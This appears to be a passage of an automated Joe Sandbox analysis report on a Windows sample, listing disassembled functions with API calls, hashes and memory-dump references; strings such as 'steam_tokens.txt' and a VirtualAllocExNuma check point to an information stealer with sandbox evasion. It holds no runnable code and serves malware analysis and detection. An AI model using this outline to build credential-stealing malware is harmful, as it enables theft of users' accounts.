                                                                                                                                                                                                                                                                                        • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4291168024-0
                                                                                                                                                                                                                                                                                        • Opcode ID: fcd257f4c3a0a866e72d349b5dd88938ffaa15781323709a9a8798aa81b5fa9c
                                                                                                                                                                                                                                                                                        • Instruction ID: 44a6bb592861ee40db77d8e48527d363e971d6850d331fc9380bd4e176600469
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fcd257f4c3a0a866e72d349b5dd88938ffaa15781323709a9a8798aa81b5fa9c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 84F02D12D207499BCB10EF7489851E6B770EF6B214F105339E88877661FB30A3D883D1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00415B70 Relevance: 4.5, APIs: 3, Instructions: 29COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
                                                                                                                                                                                                                                                                                        • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00415BAF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3183270410-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 97fc9d568dab5260ce1fa1a51ba1ebaf2853d767a04b83f08cd6b5726440208b
                                                                                                                                                                                                                                                                                        • Instruction ID: b12b055c0fde6327b7bfc42128d307bcca402a5100f46dd347d8d84938e244fe
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 97fc9d568dab5260ce1fa1a51ba1ebaf2853d767a04b83f08cd6b5726440208b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C5F05475A0010CFBDB14DFA4DC4AFED7778BB08300F004499BA0597280D6B06E85CB94
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00414400 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                                                                                                                                                                                                        • GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4203777966-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
                                                                                                                                                                                                                                                                                        • Instruction ID: 2ac30a00ccf60c4f43266989ac8565747831d88261cb92d9c694311de33eed43
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F1E0D8B0A00608FBCB20DFE4DD48BDD77BCAB04305F100055FA05D3240D7749A458B96
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 004010D0 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
                                                                                                                                                                                                                                                                                        • VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
                                                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00401103
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Process$AllocCurrentExitNumaVirtual
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1103761159-0
                                                                                                                                                                                                                                                                                        • Opcode ID: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
                                                                                                                                                                                                                                                                                        • Instruction ID: b86936f0f7b92ad6105a5e8d9325c57b614f4cde8fc05540e07f2d0ff83aec39
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1BE0867098570CBBE7309BA0DD0AB1976689B08B06F101055F7097A1D0C6B425008699
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 004119B0 Relevance: 3.1, APIs: 2, Instructions: 66stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • strtok_s.MSVCRT ref: 004119C8
                                                                                                                                                                                                                                                                                          • Part of subcall function 00411650: wsprintfA.USER32 ref: 00411669
                                                                                                                                                                                                                                                                                          • Part of subcall function 00411650: FindFirstFileA.KERNEL32(?,?), ref: 00411680
                                                                                                                                                                                                                                                                                        • strtok_s.MSVCRT ref: 00411A4D
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: strtok_s$FileFindFirstwsprintf
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3409980764-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 975833a798ef07385fb740c26f6e35f7306421425023d288693ea324a83a39c3
                                                                                                                                                                                                                                                                                        • Instruction ID: 5fc3070f54b5ba386e916c7c3ae22cc6ad81f817c7a7f871d2ab45b9afc63085
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 975833a798ef07385fb740c26f6e35f7306421425023d288693ea324a83a39c3
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 19215471900108EBCB14FFA5CC55FED7B79AF44345F10805AF51A97151EB386B84CB99
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00412B30 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,04402B50,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,0041D599,?,?,?,?,?,?,00412FF8,?), ref: 00412B5A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,044035B0), ref: 00404ED9
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrlen$lstrcpy$InternetOpen
                                                                                                                                                                                                                                                                                        • String ID: steam_tokens.txt
                                                                                                                                                                                                                                                                                        • API String ID: 2934705399-401951677
                                                                                                                                                                                                                                                                                        • Opcode ID: 0e3b4742804874a780a066254cb668122dfdc385ba13d8aa658f83288e45540c
                                                                                                                                                                                                                                                                                        • Instruction ID: 10dd2298c38adeb5e36390c5bfe4eda46295fd03d88468a146a299c80adb3810
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0e3b4742804874a780a066254cb668122dfdc385ba13d8aa658f83288e45540c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 18F08175D1020866CB18FBB2EC539ED773D9E54348B00425EF81662491EF38A788C6E9
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 004147C0 Relevance: 3.0, APIs: 2, Instructions: 17COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: InfoSystemwsprintf
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2452939696-0
                                                                                                                                                                                                                                                                                        • Opcode ID: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
                                                                                                                                                                                                                                                                                        • Instruction ID: d87a4f6b3ea3f44bdf221dc5e2fa01f01132d118a4d77551e5f155a4815ada85
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FAD012B580020C5BD720DBD0ED49AE9B77DBB44204F4049A5EE1492140EBB96AD58AA5
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0040ACE0 Relevance: 2.9, APIs: 2, Instructions: 387stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                                          • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                                                                          • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                                                                          • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040B190
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040B1A4
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,044035B0), ref: 00404ED9
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcpy$lstrlen$lstrcat$AllocInternetLocalOpenmemcmpmemset
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 574041509-0
                                                                                                                                                                                                                                                                                        • Opcode ID: a6a78ff70d27b61a9f6037f1a30da5da91f984a2f7bb54771162fbb6bc8815ef
                                                                                                                                                                                                                                                                                        • Instruction ID: df99340f366afcb3d937a345db0e295b6fae9bf0b5ece921659d29683b3ff0c0
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a6a78ff70d27b61a9f6037f1a30da5da91f984a2f7bb54771162fbb6bc8815ef
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6CE114769101189BCF15EBA1DC92EEE773DBF54308F41415EF10676091EF38AA89CBA8
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0040A6E0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040A95A
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040A96E
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,044035B0), ref: 00404ED9
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3635112192-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 7cd8234a4abdb81a99944f9f6d451a59de705a0f1975fd9f1c7cd260678ca252
                                                                                                                                                                                                                                                                                        • Instruction ID: 9f23dc4c71334aa449457ef7a0e8bbad4682aa92b3b7ddf60c673b4dae8ee631
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7cd8234a4abdb81a99944f9f6d451a59de705a0f1975fd9f1c7cd260678ca252
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC9149729102049BCF14FBA1DC51EEE773DBF54308F41425EF50666091EF38AA89CBA9
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0040AA20 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040AC1E
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040AC32
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,044035B0), ref: 00404ED9
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3635112192-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 5dd6e1886fe9a9aadc567094d83ba0008eab3b8b6066a721d99fb8c77c53bff9
                                                                                                                                                                                                                                                                                        • Instruction ID: 57c8c1270dba92ae3db9aa8e51dd660502e79bf125d10b7c0566732e7217b02b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5dd6e1886fe9a9aadc567094d83ba0008eab3b8b6066a721d99fb8c77c53bff9
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C07153759102049BCF14FBA1DC52DEE7739BF54308F41422EF506A7191EF38AA89CBA9
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 004114C0 Relevance: 2.6, APIs: 2, Instructions: 100COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00411550
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 626452242-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 46fcbcde96b391d8a91c7de27c3ae99c7866997ac8e62baa93d065818f15697d
                                                                                                                                                                                                                                                                                        • Instruction ID: 8f9af232e05b2939ec69b712380268a2006cbed21c6953bc19412128f28bf8b7
